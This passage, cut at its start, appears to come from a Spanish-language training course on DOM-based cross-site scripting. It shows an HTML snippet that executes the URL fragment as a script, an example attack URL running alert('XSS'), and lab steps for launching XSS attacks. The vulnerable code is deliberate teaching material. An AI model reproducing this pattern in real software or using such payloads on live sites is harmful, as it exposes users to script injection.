        // Imagina que este valor viene de la URL
        var userInput = window.location.hash.substring(1);
        var decoded= decodeURIComponent(userInput);
        var script = document.createElement('script');
        script.textContent = userInput; // Ejecutar alert
        document.body.appendChild(script); // Añadir script al body
    </script>
</body>
</html>
```
Si un atacante envía una URL como 'http://example.com/#alert('XSS');', el script se ejecutará en el navegador de la víctima.

### Code Example 1.7

1. Abrir el archivo resources/xss-1.html y probar el ataque de manera simple
2. Seguir las instrucciones del formador para ejecutar el código servidor y lanzar ataques xss
